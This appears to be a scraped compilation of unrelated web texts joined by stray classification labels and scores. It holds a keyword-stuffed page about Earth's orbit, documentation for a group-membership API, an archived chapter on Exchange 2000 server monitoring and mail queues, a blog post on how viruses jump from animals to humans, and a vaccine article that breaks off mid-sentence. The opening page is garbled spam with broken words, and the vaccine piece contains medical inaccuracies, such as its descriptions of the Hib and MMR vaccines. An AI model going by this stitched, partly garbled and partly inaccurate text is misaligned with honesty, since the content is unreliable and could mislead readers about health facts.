How Often Does The Earth Go Around Sun By | April 5, 2024 Ask ethan does earth orbit the sun more slowly with each new year s at its closest to alabama weather mobile 1 day of around ning and scientific diagram moon or wired takes days plete one revolution how many times has orbited live science why do all plas in same direction distance from reader digest is always location on your birthday abc spin howstuffworks this saay 99 people will get time long a pla worldatlas facts rotates sciencing fast moving e rotate solar rotation texas gateway saudi cleric says doesn t revolve humans never ped oneindia news epedia system scope relations seasons when did we realize that orbits astronomy perihelion aphelion 2024 2025 tilt sunrise sunset skymarvels what up january 2021 move kidseclipse parameters interest elliptical path every homework study age other worlds exploratorium Ask Ethan Does Earth Orbit The Sun Ask Ethan Does Earth Orbit The Sun More Slowly With Each New Year Earth At Its Closest To The Sun The New Year S With Earth At Its Closest To Sun Alabama Weather Mobile Orbit Of The Earth Around Sun 1 The Day Orbit Of Earth Around Sun Ning And Scientific Diagram The Moon Orbit Sun Or Earth Does The Moon Orbit Sun Or Earth Wired One Revolution Around The Sun The Earth Takes Days To Plete One Revolution Around Sun Earth Orbited The Sun How Many Times Has Earth Orbited The Sun Live Science The Plas Orbit In Same Direction Why Do All Of The Plas Orbit In Same Direction The Distance From Earth To Sun The Distance From Earth To Sun Reader S Digest Location On Your Birthday Is Earth Always In The Same Location On Your Birthday Science Abc Why Does Earth Spin Howstuffworks Why Does Earth Spin Howstuffworks Of People On Earth Will Get Sun At The This Saay 99 Of People On Earth Will Get Sun At The Same Time How Long Is A Day On Each Pla How Long Is A Day On Each Pla Worldatlas Sun Facts Sun Facts Why The Earth Rotates Around Sun Why The Earth Rotates Around Sun Sciencing How Fast Is Earth Moving E How Fast Is Earth Moving E Does The Sun Rotate Science Of Solar Does The Sun Rotate Science Of Solar Rotation E Earth Rotation And Revolution Texas Earth Rotation And Revolution Texas Gateway Saudi Cleric Says Earth Doesn T Revolve Saudi Cleric Says Earth Doesn T Revolve Around Sun Humans Never Ped On Moon Oneindia News Epedia Solar System Scope Epedia Solar System Scope Earth Sun Relations And Seasons Earth Sun Relations And Seasons Ask ethan does earth orbit the sun at its closest to of around moon or one revolution orbited plas in same direction distance from location on your birthday why spin howstuffworks people will get how long is a day each pla facts rotates fast moving e rotate science solar rotation and texas saudi cleric says doesn t revolve epedia system scope relations seasons orbits perihelion aphelion 2024 2025 tilt sunrise sunset what s up january 2021 do move with elliptical path age other worlds exploratorium Leave a Reply
__label__pos
0.993083
What This API Endpoint Does With the Group Memberships API you can add users to and remove users from a group. Admins see this reflected on the People tab under either the individual user or group record. Any courses assigned to the group will appear in the user's library. You can also use this API to retrieve a list of a group's members or the groups in which an individual user is enrolled. Endpoints • GET /groups/{groupId}/users - list a group's members • GET /users/{userId}/groups - list a user's groups • PUT /groups/{groupId}/users/{userId} - add a user to a group • DELETE /groups/{groupId}/users/{userId} - remove a user from a group Note: You can't use the PUT or DELETE endpoints to manage groups provisioned by SCIM. List a Group's Members GET /groups/{groupId}/users Request Parameters (Query String) • limit (integer, optional) - the maximum number of results to return in a single response (see Pagination); must be between 1 and 100 (defaults to 50) Example response { "users": [ { "id": "example-user-id-1", "email": "[email protected]", "groupsUrl": "<https://api.rise.com/users/example-user-id-1/groups>", "role": "learner", "firstName": "Example First Name 1", "lastName": "Example Last Name 1", "lastActiveAt": "2021-10-28T20:39:52.659Z", "learnerReportUrl": "<https://api.rise.com/reports/learners/example-user-id-1>", "url": "<https://api.rise.com/users/example-user-id-1>" }, ... ], "nextUrl": "<https://url-for-next-page-of-results>" } Endpoint-specific error codes: • group_not_found - cannot list users because group does not exist List a User's Groups GET /users/{userId}/groups Request Parameters (Query String) • limit (integer, optional) - the maximum number of results to return in a single response (see Pagination); must be between 1 and 100 (defaults to 50) Example response { "groups": [ { "id": "example-group-id-1", "isManagedByIdentityProvider": false, "membersUrl": "<https://api.rise.com/groups/example-group-id/users>", "name": "Example Group", "url": "<https://api.rise.com/groups/example-group-id-1>" }, ... ], "nextUrl": "<https://url-for-next-page-of-results>" } Endpoint-specific error codes: • user_not_found - cannot list user's groups because user does not exist Add User to Group PUT /groups/{groupId}/users/{userId} Success response 204 "No Content" Endpoint-specific error codes: • group_not_found - cannot add user to group because group does not exist • user_not_found - cannot add user to group because user does not exist Remove User from Group DELETE /groups/{groupId}/users/{userId} Success response 204 "No Content" Endpoint-specific error codes: • group_not_found - cannot remove user from group because group does not exist • user_not_found - cannot remove user from group because user does not exist Did this answer your question?
__label__pos
0.60167
Export (0) Print Expand All Monitoring Connections, Services, Servers, and Resource Usage Archived content. No warranty is made as to technical accuracy. Content may contain URLs that were valid when originally published, but now link to sites or pages that no longer exist. Updated : September 4, 2001 from Chapter 15, Microsoft Exchange 2000 Administrator's Pocket Consultant by William R. Stanek. As an Exchange administrator, you should routinely monitor connections, services, servers, and resource usage. These elements are the key to ensuring that the Exchange organization is running smoothly. Because you can't be on-site 24 hours a day, you can set alerts to notify you when problems occur. On This Page Checking Server and Connector Status Working with Queues Managing Queues Checking Server and Connector Status The Tools node in System Manager has a special area that you can use to track the status of Exchange servers and connectors. To access this area, follow these steps: 1. Start System Manager. 2. Expand Tools, and then expand Monitoring And Status. 3. Select Status in the console tree. In the right pane, you should now see the status of each Exchange server and connector configured for use in the organization. The status is listed as either • Available The server or connector is available for use. • Unreachable The server or connector isn't available and a problem may exist. In the Name column you may also see icons that give further indication of the status of a given server or connector: • A red circle with an X indicates that a critical monitor has exceeded its threshold value or the connector/server is unreachable. • A yellow triangle with an exclamation point indicates that a warning monitor you've set for a server has exceeded its threshold value. Tip To get the latest status on servers and connectors, right-click the Status node in the console tree, and then select Refresh. This refreshes the view, ensuring that you have the latest information. You'll learn more about configuring server monitors in the following section, "Monitoring Server Performance and Services." Monitoring Server Performance and Services Exchange 2000 monitors provide a fully automated method for monitoring server performance and tracking the status of key services. You can use Exchange 2000 monitors to track • Virtual memory usage • CPU utilization • Free disk space • SMTP and X.400 queues • Windows 2000 service status Using notifications, you can then provide automatic notification when a server exceeds a threshold value or when a key service stops. Note: Windows 2000 Performance Monitors are an alternative to Exchange 2000 monitors. You use these monitors in the Windows 2000 Performance Monitor utility as discussed in Chapter 3 of Microsoft Windows 2000 Administrator's Pocket Consultant (Microsoft Press, 2000). Setting Virtual Memory Usage Monitors Virtual memory is critically important to normal system operation. When a server runs low on virtual memory, system performance can suffer and message processing can grind to a halt. To counter this problem, you should set monitors to watch virtual memory usage, Then you can increase the amount of virtual memory available on the server or add additional RAM as needed. You configure a virtual memory monitor by completing the following steps: 1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located. 2. Expand Servers. Right-click the server you want to work with, and then select Properties. 3. In the Monitoring tab, click Add. In the Add Resource dialog box, select Available Virtual Memory, and then click OK. As shown in Figure 15-7, you'll see the Virtual Memory Thresholds dialog box. Cc722539.exch1507(en-us,TechNet.10).gif Figure 15-7: . Use the Virtual Memory Thresholds dialog box to set warning thresholds for virtual memory usage. 4. In the Duration (Minutes) field, type the number of minutes that the available virtual memory must be below a threshold to change the state. Normally, you'll want to set a value of 5 to 10 minutes. 5. To set a warning state threshold, select Warning State (Percent), and then select the smallest percentage of virtual memory your server can operate on before issuing a warning state alert. In most cases you'll want to issue warnings when less than 10 percent of virtual memory is available for an extended period of time. 6. To set a critical state threshold, select Critical State (Percent), and then select the smallest percentage of virtual memory your server can operate on before issuing a critical state alert. In most cases you'll want to issue critical alerts when less than 5 percent of virtual memory is available for an extended period of time. Note: If you also set a warning state threshold, this value must be larger. 7. Click OK. For automated notification, you must configure administrator notification. Setting CPU Utilization Monitors You can use a CPU utilization monitor to track the usage of a server's CPUs. When CPU utilization is too high, Exchange Server can't effectively process messages or manage other critical functions. As a result, performance can suffer greatly. CPU utilization at 100 percent for an extended period of time can be an indicator of serious problems on a server. Typically, you'll need to reboot a server when the CPU utilization is stuck at maximum utilization (100 percent). You configure a CPU monitor by completing the following steps: 1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located. 2. Expand Servers. Right-click the server you want to work with, and then select Properties. 3. In the Monitoring tab, click Add. In the Add Resource dialog box, select CPU Utilization, and then click OK. As shown in Figure 15-8, you'll see the CPU Utilization Thresholds dialog box. Cc722539.exch1508(en-us,TechNet.10).gif Figure 15-8: . Use the CPU Utilization Thresholds dialog box to set warning thresholds for CPU usage. 4. In Duration (Minutes), type the number of minutes that the CPU usage must exceed to change the state. Normally, you'll want to set a value of 5 to 10 minutes. 5. To set a warning state threshold, select Warning State (Percent), and then select the maximum allowable CPU before issuing a warning state alert. In most cases you'll want to issue warnings when CPU usage is 95 percent or greater for an extended period. 6. To set a critical state threshold, select Critical State (Percent), and then select the maximum allowable CPU before issuing a critical state alert. In most cases you'll want to issue warnings when CPU usage is at 100 percent for an extended period. Note: If you also set a warning state threshold, this value must be larger. 7. Click OK. For automated notification, you must configure administrator notification. Setting Free Disk Space Monitors Exchange Server uses disk space for data storage, logging, tracking, and virtual memory. When hard disks run out of space, the Exchange server malfunctions and data gets lost. To prevent serious problems, you should monitor free disk space closely on all drives used by Exchange Server. You configure a disk monitor by completing the following steps: 1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located. 2. Expand Servers. Right-click the server you want to work with, and then select Properties. 3. In the Monitoring tab, click Add. In the Add Resource dialog box, select Free Disk Space, and then click OK. As shown in Figure 15-9, you'll see the Disk Space Thresholds dialog box. Cc722539.exch1509(en-us,TechNet.10).gif Figure 15-9: . Use the Disk Space Thresholds dialog box to set the thresholds that monitor the available disk space on key drives. 4. Use the Drive To Be Monitored selection list to choose a drive you want to monitor, such as C:. 5. To set a warning state threshold, select Warning State (MB), and then select the smallest disk space (in MB) the server can operate on before issuing a warning state alert. Typically, you want Exchange Server to issue a warning when a drive has less than 100 MB of disk space. 6. To set a critical state threshold, select Critical State (MB), and then select the smallest disk space (in MB) your server can operate on before issuing a critical state alert. Typically, you'll want Exchange Server to issue a critical alert when a drive has less than 25 MB of disk space. Note: If you also set a warning state threshold, this value must be smaller. 7. Click OK. Repeat this procedure for all the drives that Exchange Server uses except M:. For automated notification, you must configure administrator notification. Setting SMTP and X.400 Queue Monitors If a messaging queue grows continuously, it means that messages aren't leaving the queue and aren't being delivered as fast as new messages arrive. This can be an indicator of network or system problems that may need your attention. You configure a queue monitor by completing the following steps: 1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located. 2. Expand Servers. Right-click the server you want to work with, and then select Properties. 3. In the Monitoring tab, click Add. To set an SMTP queue monitor, select SMTP Queue Growth, and then click OK. To set an X.400 queue monitor, select X.400 Queue Growth, and then click OK. 4. To set a warning state threshold, select Warning State, and then type the number of minutes that the queue can grow continuously before issuing a warning state alert. A queue that's growing continuously for more than 10 minutes is usually a good indicator of a potential problem. 5. To set a critical state threshold, select Critical State, and then type the number of minutes that the queue can grow continuously before issuing a critical state alert. In most cases a queue that's growing continuously for more than 30 minutes indicates a serious problem with the network or the server. Note: If you also set a warning state threshold, this value must be longer. 6. Click OK. For automated notification, you must configure administrator notification. Setting Windows 2000 Service Monitors Exchange 2000 monitors can track the status of Windows 2000 Services as well. Then if a service you've configured for monitoring is stopped, Exchange Server generates a warning or critical alert. When you install an Exchange server, certain critical services are configured for monitoring automatically. These services are displayed in the Monitoring tab under the heading Default Microsoft Exchange Services, and they're generally the following services: • Microsoft Exchange Information Store • Microsoft Exchange MTA Stacks • Microsoft Exchange Routing Engine • Microsoft Exchange System Attendant • Simple Mail Transport Protocol (SMTP) • World Wide Web Publishing Service When you configure service monitors, you can add them to the Default Microsoft Exchange Services heading. Or you can create your own heading for additional services. The key reason for grouping services under a common heading is to ease the administrative burden. Instead of having to configure separate entries for each service, you create a single entry, add services to it, and then set the alert type for all the services in the group. You configure service monitors by completing the following steps: 1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located. 2. Expand Servers. Right-click the server you want to work with, and then select Properties. 3. In the Monitoring tab, click Add. In the Add Resource dialog box, select Windows 2000 Service, and then click OK. As shown in Figure 15-10, you'll see the Services dialog box. 4. Type a name for the group of services for which you're configuring the monitor. 5. Click Add. Select a service to add to the monitor, and then click OK. Repeat as necessary. 6. When any of the selected services stops running, an alert is issued. This can be either a Warning alert or a Critical alert, depending on the value you select in the When Service Is Not Running Change State To field. 7. Click OK. For automated notification, you must configure administrator notification as described in the section of this chapter entitled "Configuring Notifications." Cc722539.exch1510(en-us,TechNet.10).gif Figure 15-10: . In the Services dialog box, type a name for the group of services you want to monitor. Then after adding the services, set the type of alert as either Warning or Critical. Removing Monitors If you don't want to use a particular monitor anymore, you can remove it by completing the following steps: 1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located. 2. Expand Servers. Right-click the server you want to work with, and then select Properties. 3. Click the Monitoring tab. You should now see a list of all monitors configured on the server. 4. Select the monitor you want to delete, and then click Remove. 5. Click OK. Disabling Monitoring When you're troubleshooting Exchange problems or performing maintenance, you may want to temporarily disable monitoring and in this way stop Exchange Server from generating alerts. To disable monitoring, complete the following steps: 1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located. 2. Expand Servers. Right-click the server you want to work with, and then select Properties. 3. Click the Monitoring tab. You should now see a list of all monitors configured on the server. 4. Select Disable All Monitoring Of This Server, and then click OK. Caution: When you're finished testing or troubleshooting, you should repeat this procedure and clear the Disable All Monitoring On This Server check box. If you forget to do this, administrators won't be notified when problems occur. Configuring Notifications One of the key reasons to configure monitoring is to notify administrators when problems occur. You can configure two types of notification: • E-Mail Used to send e-mail to administrators when a server or connector enters a warning or critical state • Script Used to have Exchange Server execute a script when a server or connector enters a warning or critical state The sections that follow explain how you can create and manage notifications. Note: Useful resources for creating scripts are Windows NT Scripting Administrator's Guide, and Windows 2000 Scripting Bible (IDG Books Worldwide, 2000). Notifying by E-Mail You use e-mail notification to send e-mail to administrators when a server or connector enters a warning or critical state. You can select multiple recipients to be notified and you can select a specific server to use in generating the e-mail. To configure e-mail notification, follow these steps: 1. Start System Manager. 2. Expand Tools, and then expand Monitoring And Status. 3. Right-click the Notification folder, point to New, and then click E-Mail Notification. This displays the Properties dialog box shown in Figure 15-11. 4. To specify the server that will monitor and notify users by e-mail, click Select, and then choose a server. Cc722539.exch1511(en-us,TechNet.10).gif Figure 15-11: . Use the Properties dialog box to configure e-mail notification. 5. Use the Servers And Connectors To Monitor list box to choose the servers or connectors you want administrators to be notified about. The available options are • This Server • All Servers • Any Server In The Routing Group • All Connectors • Any Connector In The Routing Group • Custom List Of Servers • Custom List Of Connectors Note: To create a custom list of servers or connectors, select Custom List Of Servers or Custom List Of Connectors, and then click Customize. Afterward, in the Custom List windows, click Add, and then choose a server or connector to add to the custom list. 6. You can configure notification for either Warning alerts or Critical state alerts. Use Notify When Monitored Items Are In to choose the state that triggers notification. 7. Click To, and then select a recipient to notify. You can notify multiple users by selecting an appropriate mail-enabled group. 8. Click Cc, and then select additional recipients to notify. Again, you can notify multiple users by selecting an appropriate mail-enabled group. 9. Click E-Mail Server, and then choose the e-mail server that should generate the e-mail message. 10. Use the Subject field to set a subject for the notification message. The default subject line specifies the type of alert that occurred and the item on which the alert occurred. These values are represented by the subject line %TargetInstance.ServerStateString% on %TargetInstance.Name%. 11. The message box at the bottom of the window sets the body of the message. In most cases you'll want to edit the default message body. The default text tells administrators the following information: • %TargetInstance.Name% is the name of the server or connector that triggered the notification • %TargetInstance.ServerStateString% is the type of alert • %TargetInstance.QueuesStateString% is the reported status of queues • %TargetInstance.DisksStateString% is the reported status of drives • %TargetInstance.ServicesStateString% is the reported status of services • %TargetInstance.MemoryStateString% is the reported status of virtual memory • %TargetInstance.CPUStateString% is the reported status of CPUs 12. Click OK. Repeat this procedure to configure notification for other servers and connectors. Using Script Notification You use script notification to have Exchange Server execute a script when a server or connector enters a warning or critical state. The script can execute commands that restart processes, clear up disk space, or perform other actions needed to resolve a problem on the Exchange server. The script could also generate an e-mail through an alternate gateway, which is useful if the Exchange server is unable to deliver e-mail. To configure script notification, follow these steps: 1. Start System Manager. 2. Expand Tools, and then expand Monitoring And Status. 3. Right-click the Notification folder, point to New, and then click Script Notification. This displays the Properties dialog box shown in Figure 15-12. 4. To specify the server that will monitor and notify users by e-mail, click Select, and then choose a server. Cc722539.exch1512(en-us,TechNet.10).gif Figure 15-12: . Use the Properties dialog box to configure script notification. 5. Use the Servers And Connectors To Monitor list box to choose the servers or connectors you want administrators to be notified about. The available options are • This Server • All Servers • Any Server In The Routing Group • All Connectors • Any Connector In The Routing Group • Custom List Of Servers • Custom List Of Connectors Note: To create a custom list of servers or connectors, select Custom List Of Servers or Custom List Of Connectors, and then click Customize. Afterward, in the Custom List windows, click Add, and then choose a server or connector to add to the custom list. 6. You can configure notification for either Warning alerts or Critical state alerts. Use Notify When Monitored Items Are In to choose the state that triggers notification. 7. In Path To Executable, type the complete file path to the script you want to execute, such as C:\scripts\mynotificationscript.vbs. You can run any type of executable file, including batch scripts with the .bat or .cmd extension and Windows scripts with the .vb, .js, .pl, or .wsc extension. Note: The Exchange System Attendant must have permission to execute this script, so be sure to grant access to the local system account or any other account that you've configured to run this service. 8. To pass arguments to a script or application, type the options in the Command Line Options field. 9. Click OK. Viewing and Editing Current Notifications You can view all notifications configured in the organization with the Notification entry in System Manager. Start System Manager, expand Tools, expand Monitoring And Status, and then select Notifications. Each notification is displayed with summary information depicting the following: • Name of the monitoring server • Items monitored • Action performed • State that triggers notification To edit a notification, double-click it, and then modify the settings as necessary. When you're finished, click OK. To delete a notification, right-click it, and then select Delete. When prompted to confirm the action, click Yes. Working with Queues As an Exchange administrator, it's your responsibility to monitor Exchange queues regularly. Exchange Server uses queues to hold messages while they're being processed for routing and delivery. If messages remain in a queue for an extended period, there may be a problem. For example, if an Exchange server is unable to connect to the network, you'll find that messages aren't being cleared out of queues. Exchange Server supports two types of queues: • System queues The default queues in the organization. There are three providers for system queues: SMTP, Microsoft MTA (X.400), and MAPI (Messaging Application Programming Interface). • Link queues Created by Exchange Server when there are multiple messages bound for the same destination. These queues are accessible only when they have messages waiting to be routed. Using SMTP Queues Each SMTP virtual server has several system queues associated with it. These queues are • Local Delivery Contains messages that are queued for local delivery—that is, messages that the Exchange server is waiting to deliver to a local Exchange mailbox. • Messages Awaiting Directory Lookup Contains messages to recipients who have not yet been resolved in Active Directory. • Messages Waiting To Be Routed Contains messages waiting to be routed to a destination server. Messages move from here to a link queue. • Final Destination Currently Unreachable Contains messages that can't be routed because the destination server is unreachable. • Pre-Submission Contains messages that have been acknowledged and accepted by the SMTP service but haven't been processed yet. As you can see, SMTP queues are used to hold messages in various stages of routing. You access these queues through the SMTP virtual server node by completing the following steps: 1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located. 2. Navigate to the Protocols container in the console tree. Expand Servers, expand the server you want to work with, and then expand Protocols. 3. Navigate to a virtual server's Queues node. Expand SMTP, expand the virtual server you want to work with, and then expand Queues. 4. Select the queue you want to work with. Using Microsoft MTA (X.400) Queues The Microsoft Message Transfer Agent (MTA) provides addressing and routing information for sending messages from one server to another. The MTA relies on X.400 transfer stacks to provide additional details for message transfer, and these stacks are similar in purpose to the Exchange virtual servers used with SMTP. The key queue used with the Microsoft MTA is the PendingRerouteQ. This queue contains messages that are waiting to be rerouted after a temporary link outage. To access the PendingRerouteQ, follow these steps: 1. Start System Manager. If administrative groups are enabled, expand the administrative group in which the server you want to use is located. 2. Navigate to the Protocols container in the console tree. Expand Servers, expand the server you want to work with, and then expand Protocols. 3. Expand X.400, and then expand Queues. Finally, select PendingRerouteQ. Using MAPI Queues Novell GroupWise, Lotus Notes, and Lotus cc:Mail connectors all use MAPI queues. MAPI queues are used to route and deliver messages over the related connector. The queues you may see are • MTS-In Contains messages that have come to the Exchange organization over the connector. The message contents and addresses haven't been converted to Exchange format. • Ready-In Contains messages that have been converted to Exchange format and are ready to be delivered. Recipient addresses still need to be resolved. • Ready-Out Contains messages that have been prepared for delivery to a foreign system. The message addresses have been resolved, but the message contents haven't been converted. • Badmail Contains all messages that caused errors when the connector tried to process them. No further delivery attempts are made on these messages and they are stored in this queue until you delete them manually. To access a MAPI queue, follow these steps: 1. Start System Manager. If administrative groups are enabled, expand the administrative group you want to work with. 2. If available, expand Routing Groups , and then expand the routing group that contains the connector you want to work with. 3. Navigate to the connector's Queues node. Expand Connectors, expand the connector, and then expand Queues. 4. Select the queue you want to work with. Managing Queues You usually won't see messages in queues because they're processed and routed quickly. Messages come into a queue, Exchange Server performs a lookup or establishes a connection, and then Exchange Server either moves the message to a new queue or delivers it to its destination. Messages remain in a queue when there's a problem. To check for problem messages, you must enumerate messages in the queue. Messages aren't enumerated by default—you must do this manually. Enumerating Messages in Queues In order to manage queues, you must enumerate messages. This process allows you to examine queue contents and perform management tasks on messages within a particular queue. The easiest way to enumerate messages is to do so in sets of 100. To display the first 100 messages in a queue, follow these steps: 1. Start System Manager, and then navigate to the queue you want to work with. 2. Right-click the queue, and then select Enumerate 100 Messages. Repeat this process if you want to access the next 100 messages. Or to refresh the current list of messages, right-click the queue, and then select Re-enumerate. Note: You can only re-enumerate a queue that you've managed previously. If you haven't enumerated a queue previously, the Details pane will display the following message: Enumerate messages from the queue node. Additionally, if there are no messages in the queue, the Details pane will display the following message: There are no matching messages queued. You can also use a custom filter to enumerate messages. To create a custom filter and then set the filter as the default, follow these steps: 1. Start System Manager, and then navigate to the queue you want to work with. 2. Right-click the queue, and then select Custom Filter. 3. From the Action selection list, select Enumerate. 4. To select a specific number of messages, choose Select Only The, and then specify the Number Of Messages to enumerate. 5. To select messages by other criteria, choose Select Messages That Are, and then set the enumeration criteria. 6. To select all available messages, choose Select All Messages. 7. Optionally, you can save your changes as the default filter by selecting Set As Default Filter. 8. When you click OK, the custom filter is automatically executed. Understanding Queue Summaries and Queue States Whenever you click a Queues node in System Manager, you get a summary of the currently available queues for the selected node. These queues can include both system and link queues, depending on the state of the Exchange server. Although queue summaries provide important details for troubleshooting message flow problems, you do have to know what to look for. The connection state is the key information to look at first. This value tells you the state of the queue. States you'll see include • Active An active queue is needed to allow messages to be transported out of a link queue. • Ready A ready queue is needed to allow messages to be transported out of a system queue. When link queues are ready, they can have a connection allocated to them. • Retry A connection attempt has failed and the server is waiting to retry. • Scheduled The server is waiting for a scheduled connection time. • Remote The server is waiting for a remote dequeue command (TURN/ETRN). • Frozen The queue is frozen, and none of its messages can be processed for routing. Messages can enter the queue, however, as long as the Exchange routing categorizer is running. You must unfreeze the queue to resume normal queue operations. Administrators can choose to enable or disable connections to queues. If connections are disabled, the queue is unable to route and deliver messages. You can change the queue state to Active by using the FORCE CONNECTION command. When you do this, Exchange Server should immediately enable a connection for the queue, which will allow messages to be routed and delivered from it. You can force a connection to change the Retry or Scheduled state as well. Other summary information that you may find useful in troubleshooting includes: • Time Of Submission Of Oldest Msg Tells you when the oldest message was sent by a client. Any time the oldest message has been in the queue for several days, you have a problem with message delivery. Either Exchange Server is having a problem routing that specific message, or a deeper routing problem may be affecting the organization. • Total # Of Msgs Tells you the total number of messages waiting in the queue. If you see a large number of messages waiting in the queue, you may have a connectivity or routing problem. • Total Msg Size (KB) Tells you the total size of all messages in the queue. Large messages can take a long time to deliver, and, as a result, they may slow down message delivery. • Time Of Next Connection Retry When the connection state is Retry, this column tells you when another connection attempt will be made. You can use Force Connection to attempt a connection immediately. Viewing Message Details Anytime a message is displayed in a queue, you can double-click it to view message details. The details provide additional information that identifies the message, including a message ID that you can use with message tracking. Enabling and Disabling Connections to Queues The only way to enable and disable connections to queues is on a global basis, which means that you enable or disable all queues for a given SMTP virtual server, MTA object, or connector. Enabling queues makes the queues available for routing and delivery. Disabling queues makes the queues unavailable for routing and delivery. To enable or disable connections to queues, follow these steps: 1. Start System Manager. 2. Navigate to the Queues node for the SMTP virtual server, MTA object, or connector you want to manage. 3. To enable connections to all queues, right-click the Queues node, and then select Enable All Connections. 4. To disable connections to all queues, right-click the Queues node, and then select Disable All Connections. Forcing Connections to Queues In most cases you can change the queue state to Active by forcing a connection. Simply right-click the queue, and then select Force Connection. When you do this, Exchange Server should immediately enable connections to the queue, and this should allow messages to be routed and delivered from it. Freezing and Unfreezing Queues When you freeze a queue, all message transfer out of that queue stops. This means that messages can continue to enter the queue but no messages will leave it. To restore normal operations, you must unfreeze the queue. You freeze and then unfreeze a queue by completing the following steps: 1. Start System Manager, and then navigate to the queue you want to work with. 2. Enumerate the queue so that you can see the messages it contains. 3. Right-click the queue, and then select Freeze All Messages. 4. When you're done troubleshooting, right-click the queue, and then select Unfreeze All Messages. Another way to freeze messages in a queue is to do so selectively. In this way, you can control the transport of a single message or several messages that may be causing problems on the server. For example, if a large message is delaying the delivery of other messages, you can freeze the message until other messages have left the queue. Afterward, you can unfreeze the message to resume normal delivery. To freeze and then unfreeze an individual message, complete the following steps: 1. Start System Manager, and then navigate to the queue you want to work with. 2. Enumerate messages in the queue. 3. Right-click the problem message, and then select Freeze. 4. When you're ready to resume delivery of the message, right-click the problem message, and then select Unfreeze. Deleting Messages from Queues You can remove messages from queues in several ways. To delete all messages in a queue, follow these steps: 1. Start System Manager, and then navigate to the queue you want to work with. 2. Enumerate the messages in the queue to make sure that you really want to delete all the messages that the queue contains. 3. Right-click the queue, and then select one of the following options: • Delete All Messages (No NDR) Deletes all messages from the queue without sending a nondelivery report to the sender • Delete All Messages (Send NDR) Deletes all messages from the queue and notifies the sender with a nondelivery report 4. When prompted, click Yes to confirm the deletion. To delete messages selectively, follow these steps: 1. Start System Manager, and then navigate to the queue you want to work with. 2. Enumerate messages in the queue. 3. Right-click the message or messages that you want to delete, and then select one of the following options: • Delete Messages (No NDR) Deletes the selected messages from the queue without sending a nondelivery report to the sender. • Delete Messages (Send NDR) Deletes the selected messages from the queue and notifies the sender with a nondelivery report. 4. When prompted, click Yes to confirm the deletion. Deleting messages from a queue removes them from the messaging system permanently. You can't recover the deleted messages. from Microsoft Exchange 2000 Administrator's Pocket Consultant by William R. Stanek. Copyright © 1999 Microsoft Corporation. Link Click to order Was this page helpful? (1500 characters remaining) Thank you for your feedback Show: © 2014 Microsoft
__label__pos
0.823761
Bite-sized knowledge for the hungrily curious Nov30 Mon8pm Stay tuned. Our next quiz will be on Nov 30. How do viruses jump from animals to humans? The recent coronavirus outbreak from China is believed to have originated from a wildlife market in the City of Wuhan. At the time of writing this post, it is believed that the source of the virus may have been a snake. Previous outbreaks of other coronaviruses, SARS and MERS are believed to have jumped from civet cats and camels respectively, and other viruses like Ebola have animal origins. So that tells us what happened, but we want to know how. To explore that, first, we need to understand how viruses work. Viruses are a type of organic parasite infecting nearly all forms of life. To survive and reproduce, they must move through three stages: contact with a susceptible host, infection and replication, and transmission to other individuals. Ben Longdon: How do viruses jump from animals to humans? | TED Talk In Ben Longdon’s TED Talk, cited above, he explains that “Human viruses are covered in proteins adapted to bind with matching receptors on human respiratory cells.” Once bound, the virus hijacks the cell’s genetic material to replicate and infect other cells. The key point in the paragraph above that the proteins around a virus are adapted to the target host. How does this happen? The key to this is rapid mutation. … becaue viruses rapidly reproduce by the millions, the can quickly develop random mutations. Most mutations have no effect or even prove detrimental; but a small proportion may enable the pathogen to better infect a new species. Ben Longdon: How do viruses jump from animals to humans? | TED Talk The success of a mutated virus is dependent both on how well it is adapted to the new host, and how well it evades the host’s immune response. Viruses are more likely to jump between hosts that are genetically similar that those that are not. In the case of SARS and MERS, the virus is believed to have jumped to humans from other warm-blooded mammals. Coronavirus: CDC/Dr. Fred Murphy In the case of the new coronavirus from Wuhan (scientific name “2019 Novel Coronavirus or “2019-nCoV”), if it jumped from a snake, this would seem to be between two less-similar species. What is a coronavirus? Coronaviruses are common in different species of animals, including camels and bats. Most of these viruses affect animals, but not people – with a few notable exceptions, as noted above. Coronaviruses are so named because they have a halo, or crown-like appearance when viewed under an electron microscope. Check Out Ben Longdon’s TED Talk Rate This Biscuit Average rating / 5. Vote count: No ratings so far! Be the first to rate this wisdom biscuit. As you found this post useful... Follow us on social media!
__label__pos
0.93808
What to Expect When It’s Time For Your Child’s 15 Month Shots The 15 month shots are administered during a routine checkup. However, the shots may vary depending on the pediatrician. You can generally expect for your child to receive Hep A/B, DTaP, Hib, PCF, IPV, influenza, MMR, and varicella. (The Pentacel vaccine may be used as a replacement for some of these vaccines, to help minimize the number of injections your baby receives; ask your pediatrician about it.) Before you go to your child’s 15-month check-up, it’s helpful to know what the immunizations will help protect your baby against, as well as any possible side effects. What are HepB and HepA? Hepatitis A/B vaccinations should be given to a child at three intervals. Babies are given a shot at birth, between the ages of 2 to 4 months of age, and around 15 months. Hep A/B is a terrible condition that attacks the liver. Watch for anything out of the ordinary after the shot is administered. Fevers, rashes, and any other unusual symptoms should be reported to your child’s pediatrician. Infants with weakened immune systems or born prematurely are more susceptible to Hep A/B. What is DTap? This vaccination is for diphtheria, tetanus, and pertussis. Diphtheria is a respiratory condition. Tetanus is lockjaw caused by bacteria found in soil, and pertussis is a form of whooping cough. Even though a child is fully vaccinated, they will need these updated every 10 years. They should receive five doses at ages 2, 4, 6 and 15 to 18 months. The last dose is between 4- and 6-years-old. If any side effects present after the initial doses, including constant crying up to three hours of the shot and a fever of 105 degrees F, consult your pediatrician. What is Hib? The Hib vaccine is to protect against Haemophilus influenza. Two or three doses are given before a child is 6 years of age. Pain at the injection site is common as is a low-grade fever. However, this vaccination is well-tolerated. What is IPV? IPV is a vaccination against polio that is given in the arm or the leg. It is given at four stages: ages 2, 4, and 6 to 18 months. Another booster dose is given between 4 and 6 years of age. Any child who had a reaction previously or is allergic to the antibiotics streptomycin or polymyxin B should not take this vaccination. Does my child need an influenza shot? Influenza A and B are stopped with this vaccination. Though many people feel it is unnecessary, the flu can easily kill small children. The shot may make a child lethargic for a few days, but new formulas come with little to no side effects. What is MMR? The MMR vaccine helps protect again against German measles. The 